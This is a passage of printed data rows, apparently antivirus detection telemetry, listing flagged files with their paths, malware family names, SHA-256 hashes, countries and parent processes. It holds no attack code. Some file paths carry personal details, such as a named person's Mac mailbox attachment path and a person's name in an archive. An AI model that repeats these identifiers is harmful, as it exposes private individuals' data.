  Row(detection=Row(filename='avscan-20181102-062045-66caf37b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062045-66CAF37B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba1bc167', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA1BC167', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba110a7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA110A7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051840-ba9bfc28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051840-BA9BFC28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  ...],
 [Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='00316e6fbe435d57bbb912cbcda39581b9a53a966d096e0c183a3913e42c127c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\0083963C4655CD66B99064C581EE03F11B581B928CE15DABE95E49B8D3C76AF4', filesize=852000, name='W32/Neshta.A.#M1.#R1'), hash='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:06:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\0083963C4655CD66B99064C581EE03F11B581B928CE15DABE95E49B8D3C76AF4', filesize=852000, name='W32/Neshta.A.#M1.#R1'), hash='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:48:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='00de433c065d209a185b83b24fc54ac59a19fdb0073b4415d09537b31deef689', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~2\\\\\\\\Avira\\\\\\\\Launcher\\\\\\\\AVIRAS~2.EXE\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-01T16:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171648-2af1a826', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2ac047b8\\AVSCAN-20181101-171638-28E900CA\\AVSCAN-20181101-171648-2AF1A826', filesize=512000, name='PUA/FusionCore.Gen7.#M1.#R1'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:17:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installer.exe', filepath='C:\\Users\\X\\Downloads\\installer.exe', filesize=512000, name='ADWARE/DealPly.Gen8.#M300.#R700907'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline='--engine=2 --session-id=1xaDbvHliwtrTc\\\\\\/MBVUtLUDo2CahmBIL9A7A2s4l --registry-suffix=ESET', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.169.200\\software_reporter_tool.exe', parentsize=13796472, timestamp='2018-11-01T16:16:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farnfdp.exe', filepath='D:\\Backup\\Windows\\system32\\spool\\drivers\\w32x86\\epsonepson_stylus_tx49ee\\E_FARNFDP.EXE', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='01182f320d17b5e8278062b5081ad55bd32c65e3e41221348c8846f913cffa42', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xcopy.exe', filepath='\\\\?\\C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='011950d1ebe4c9b09276a34f0c41ab31f0e5e9d6561f68ddf41f4aa28df97e31', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='noteicon.exe', filepath='C:\\Program Files\\IObit\\IObit Uninstaller\\NoteIcon.exe', filesize=116000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0121252491e1b22093a267ad3ccb52b8ffcd503dc00e8b0019523f4e131da1a6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:TkbRpJqjzE695tHL.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T21:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='018443b7f79d669be1c20a5e6850edeb888caf5b764b75ecf501faba60700516', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\018443B7F79D669BE1C20A5E6850EDEB888CAF5B764B75ECF501FABA60700516', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='018443b7f79d669be1c20a5e6850edeb888caf5b764b75ecf501faba60700516', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T13:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T03:57:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T13:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091024-9bc3253f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0325020e\\AVSCAN-20181101-090025-3A08BDB6\\AVSCAN-20181101-091024-9BC3253F', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='01a8b234055d80db96a6d517af5b4ea90037f41dc4e55b7f6f240759c955470a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0259e185938b1783d31e6a8167c82e8359e8396bb1aba634027c6164f436e2b7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-4\\0259E185938B1783D31E6A8167C82E8359E8396BB1ABA634027C6164F436E2B7', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='0259e185938b1783d31e6a8167c82e8359e8396bb1aba634027c6164f436e2b7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\16.03.2018-195.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993.MRG', filesize=704000, name='TR/Crypt.XPACK.Gen5.#M300.#R400496'), hash='029a66c12710dd68353483526f9f9595fcfd21be952567e36835053f35ecb993', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.04.2018-108.categorized\\\\\\\\unpacked -PERHASH', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T13:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204553-c3a15e1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72a51702\\AVSCAN-20181101-204243-A28B5228\\AVSCAN-20181101-204553-C3A15E1E', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='031403edb62da430c74609a4a7984b8643826e3baf13511d8f464cfd504b2b8f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\031403EDB62DA430C74609A4A7984B8643826E3BAF13511D8F464CFD504B2B8F', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='031403edb62da430c74609a4a7984b8643826e3baf13511d8f464cfd504b2b8f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0322902f9324b20b882c9fec1eb4449503f66bd60424b8a7cb1ee452ce7dd4f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\0322902F9324B20B882C9FEC1EB4449503F66BD60424B8A7CB1EE452CE7DD4F7', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='0322902f9324b20b882c9fec1eb4449503f66bd60424b8a7cb1ee452ce7dd4f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111447-7fa35114', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08abe59c\\AVSCAN-20181101-111427-7BC35216\\AVSCAN-20181101-111447-7FA35114', filesize=704000, name='TR/Crypt.ZPACK.0340cb.#M1.#R1'), hash='0340cb52b73987678952ae42cbe81058dee4f54c8dbf0388b6905a92d3f36210', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manfred kirchgessner 16.03.2017.com', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Manfred Kirchgessner 16.03.2017.zip\\Manfred Kirchgessner 16.03.2017.com', filesize=704000, name='HEUR/AGEN.1014955.#M1.#R1'), hash='0340cb52b73987678952ae42cbe81058dee4f54c8dbf0388b6905a92d3f36210', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-01T10:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='teamviewerqs_pt-idc3mrbjd7.exe', filepath='C:\\Cordilheira_SQL\\Programas\\TeamViewerQS_pt-idc3mrbjd7.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='0343a80cf453314f6dd22a88404411b07fd1c4e99d9d305b9439ac14fb2c3d02', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:GYBAjA6bc0S9tnWf.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T10:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diffupdater.exe', filepath='C:\\Program Files\\Canon\\Auto Update Service\\DiffUpdater.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='035ae9c78f8b49cfda986c1a83d5f42f3f9efcf0c3c2559a91c2b778668f2d20', metadata=Row(cmdline='\\\\\\/view=wipe-folders', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\TuneUp Utilities 2008\\Shredder.exe', parentsize=170240, timestamp='2018-11-01T20:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='order #5011-b6109 .xls', filepath='/Volumes/com.apple.TimeMachine.localsnapshots/Backups.backupdb/Barbara Teicher’s MacBook Pro/2018-11-01-161957/Macintosh HD/Users/barbarateicher/Library/Mail/V5/017C0CDF-3ADE-49D5-9BB4-DABDD062563F/INBOX.mbox/02CD974B-2FEB-43A6-88AA-5618AA763798/Data/8/4/0/1/Attachments/1048902/2/Order #5011-B6109 .xls', filesize=64000, name='X97M/Agent.76545964.#M0.#R0'), hash='039949bfb477668fd4b8397c1bf8593d4e4d6ea4eda54d7da86c2f1e449e4351', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='--______--_-----__-_-_-___------____----_---_--_______-.{36b3b00f-6aaa-4b71-a6c3-9d0ace89d5ba}', filepath='E:\\FEBRUARY.FINEL.2017\\8.02.2017\\7x5\\--______--_-----__-_-_-___------____----_---_--_______-.{36B3B00F-6AAA-4B71-A6C3-9D0ACE89D5BA}', filesize=7236000, name='WORM/Lodbak.Gen4.#M2.#R300496'), hash='0399d1d7c1499f388d77e037013ae39881091de6f3152f6d8a8428d417a81e64', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jkh.open.info.tariff.warm факт 2011.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\Стандарты раскрытия информации\\факт\\JKH.OPEN.INFO.TARIFF.WARM факт 2011.xls', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='0404e94fb8da402743222554e04c0ee17b27badb88f94f144b8935317e587f97', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0429b5ba85637e118eb544eeffbdb38f5a79217ad2391fdf02e8d677ab26aa53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\0429B5BA85637E118EB544EEFFBDB38F5A79217AD2391FDF02E8D677AB26AA53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0429b5ba85637e118eb544eeffbdb38f5a79217ad2391fdf02e8d677ab26aa53', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hosts-bg.exe', filepath='H:\\Program Files\\hosts\\hosts-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-01T04:44:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-004512-b0c2592d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_05b167eb\\AVSCAN-20181101-004458-A89A3C36\\AVSCAN-20181101-004512-B0C2592D', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:45:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ktfdrm_ucc.dll', filepath='C:\\Program Files (x86)\\Samsung\\Samsung New PC Studio\\KTFDRM_UCC.dll', filesize=512000, name='W32/Nimnul.D.#M1.#R1'), hash='0479b46fd31c057040a06223d37efe907f1440979dd465e2fbd8bed6d374e803', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:08:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='klist.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\klist.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='048a2eda453b329d6c9cf84b3e3f0c79732bf8ab23e1f2168b4d279cebf9095f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dtlite4491-0356.exe', filepath='J:\\prog\\program\\DTLite4491-0356.exe', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='04b60e21e23495c4f85c5f90e169866497f01f423bcccd17031a3576d21d3e08', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Novicorp WinToFlash\\WinToFlash.exe', parentsize=2985472, timestamp='2018-11-01T20:38:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='F:\\MI files\\MiPhone_MiFlash\\Note 3 mtk\\XIAOMI_REDMI_NOTE_3_MT6795_Tools_IMEI_REPAIR\\Mediatek_MT6795_Tools_IMEI\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='053997ec1594f9dda48c0ccfdc74fcd9495847ed5dcd5406d8c0600796324dce', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:33:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='argent.dll', filepath='C:\\Program Files (x86)\\Shirl\\argent.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='argent.vir', filepath='C:\\Program Files (x86)\\Shirl\\argent.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152152-74663961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_787b8ae0\\AVSCAN-20181101-152135-71E4C518\\AVSCAN-20181101-152152-74663961', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:12Z'), dt=datetime.date(2018, 11, 1)),
